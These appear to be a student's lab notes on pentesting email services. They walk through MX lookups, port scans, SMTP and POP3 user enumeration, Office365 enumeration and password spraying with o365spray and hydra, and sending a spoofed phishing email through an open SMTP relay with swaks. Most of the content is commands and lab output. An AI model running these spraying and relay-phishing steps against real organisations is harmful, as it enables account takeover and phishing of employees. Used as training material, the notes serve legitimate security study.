Attacking Email Services
What I would do if I encounter email services... trying to pentest it.
first, I would do an nmap scan on the ports
then, I would try to enumerate the users on the mail server, and try to spray passwords (if mail server is provided by cloud, use o365spray)
once I get inside of the mail server, I will login and read the emails by telnetting into pop3
Table of Contents
- Enumeration
- MX Records
- Ports
- User Enumeration
- Cloud Enumeration
- Password Attacks
after we got usernames, we can attempt to spary passwords - Protocol Specific Attacks
Enumeration
MX Records
host:
> host -t MX hackthebox.eu
hackthebox.eu mail is handled by 1 aspmx.l.google.com.
> host -t MX microsoft.com
microsoft.com mail is handled by 10 microsoft-com.mail.protection.outlook.com.
host -t A mail1.inlanefreight.htb.
mail1.inlanefreight.htb has address 10.129.14.128
DIG:
dig mx plaintext.do | grep "MX" | grep -v ";"
plaintext.do. 7076 IN MX 50 mx3.zoho.com.
plaintext.do. 7076 IN MX 10 mx.zoho.com.
plaintext.do. 7076 IN MX 20 mx2.zoho.com.
dig mx inlanefreight.com | grep "MX" | grep -v ";"
inlanefreight.com. 300 IN MX 10 mail1.inlanefreight.com.
Ports
enumerating a custom mail server,
| Port | Service |
|---|---|
TCP/25 | SMTP Unencrypted |
TCP/143 | IMAP4 Unencrypted |
TCP/110 | POP3 Unencrypted |
TCP/465 | SMTP Encrypted |
TCP/587 | SMTP Encrypted/STARTTLS |
TCP/993 | IMAP4 Encrypted |
TCP/995 | POP3 Encrypted |
| nmap: |
sudo nmap -Pn -sV -sC -p25,143,110,465,587,993,995 10.129.14.128
VRFY
- connect via telnet
telnet 10.10.110.20 25
- verify if a user exists
VRFY www-data
or
VRFY root
EXPN
bigger problem than VRFY, since sites have an alias such as "all", expose more
> telnet 10.10.110.20 25
EXPN john
250 2.1.0 john@inlanefreight.htb
EXPN support-team
250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb
RCPT TO
└─$ telnet 10.129.62.133 25
Trying 10.129.62.133...
Connected to 10.129.62.133.
Escape character is '^]'.
220 WIN-EASY ESMTP
HELO example.com
250 Hello.
MAIL FROM:<test@example.com>
250 OK
RCPT TO:<fiona@inlanefreight.htb>
250 OK
RCPT TO: <fuck@inlanefreight.htb>
550 Unknown user
USER
this is a POP3 protocol command. so telnet via port 110
> telnet 10.10.110.20 110
USER julio
-ERR
USER john
+OK
Automated User Enumeration
smtp-user-enum -M VRFY -U userlist.txt -t 10.129.40.47 -w 20
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7
-M can be VRFY, RCPT, EXPN
Cloud Enumeration
not custom mail server; but service provided by cloud
Office365
- validate if target domain is using Office365
download o365spray.py
> python3 o365spray.py --validate --domain msplaintext.xyz
*** O365 Spray ***
>----------------------------------------<
> version : 2.0.4
> domain : msplaintext.xyz
> validate : True
> timeout : 25 seconds
> start : 2022-04-13 09:46:40
>----------------------------------------<
[2022-04-13 09:46:40,344] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:46:40,743] INFO : [VALID] The following domain is using O365: msplaintext.xyz
- identify usernames
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz
*** O365 Spray ***
>----------------------------------------<
> version : 2.0.4
> domain : msplaintext.xyz
> enum : True
> userfile : users.txt
> enum_module : office
> rate : 10 threads
> timeout : 25 seconds
> start : 2022-04-13 09:48:03
>----------------------------------------<
[2022-04-13 09:48:03,621] INFO : Running O365 validation for: msplaintext.xyz
[2022-04-13 09:48:04,062] INFO : [VALID] The following domain is using O365: msplaintext.xyz
[2022-04-13 09:48:04,064] INFO : Running user enumeration against 67 potential users
[2022-04-13 09:48:08,244] INFO : [VALID] lewen@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO : [VALID] juurena@msplaintext.xyz
[2022-04-13 09:48:10,415] INFO :
[ * ] Valid accounts can be found at: '/opt/o365spray/enum/enum_valid_accounts.2204130948.txt'
[ * ] All enumerated accounts can be found at: '/opt/o365spray/enum/enum_tested_accounts.2204130948.txt'
[2022-04-13 09:48:10,416] INFO : Valid Accounts: 2
Password Spraying
POP3
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3
Office365 Spraying
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz
Protocol Specific Attacks
SMTP Open Relay
- check if vulnerability exists
nmap -p25 -Pn --script smtp-open-relay 10.10.11.213
- use any mail client to connect and send our email
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213
=== Trying 10.10.11.213:25...
=== Connected to 10.10.11.213.
<- 220 mail.localdomain SMTP Mailer ready
-> EHLO parrot
<- 250-mail.localdomain
<- 250-SIZE 33554432
<- 250-8BITMIME
<- 250-STARTTLS
<- 250-AUTH LOGIN PLAIN CRAM-MD5 CRAM-SHA1
<- 250 HELP
-> MAIL FROM:<notifications@inlanefreight.com>
<- 250 OK
-> RCPT TO:<employees@inlanefreight.com>
<- 250 OK
-> DATA
<- 354 End data with <CR><LF>.<CR><LF>
-> Date: Thu, 29 Oct 2020 01:36:06 -0400
-> To: employees@inlanefreight.com
-> From: notifications@inlanefreight.com
-> Subject: Company Notification
-> Message-Id: <20201029013606.775675@parrot>
-> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/
->
-> Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/
->
->
-> .
<- 250 OK
-> QUIT
<- 221 Bye
=== Connection closed with remote host.
connecting to the encrypted POP3 server at port 995
openssl s_client -connect 10.129.180.139:995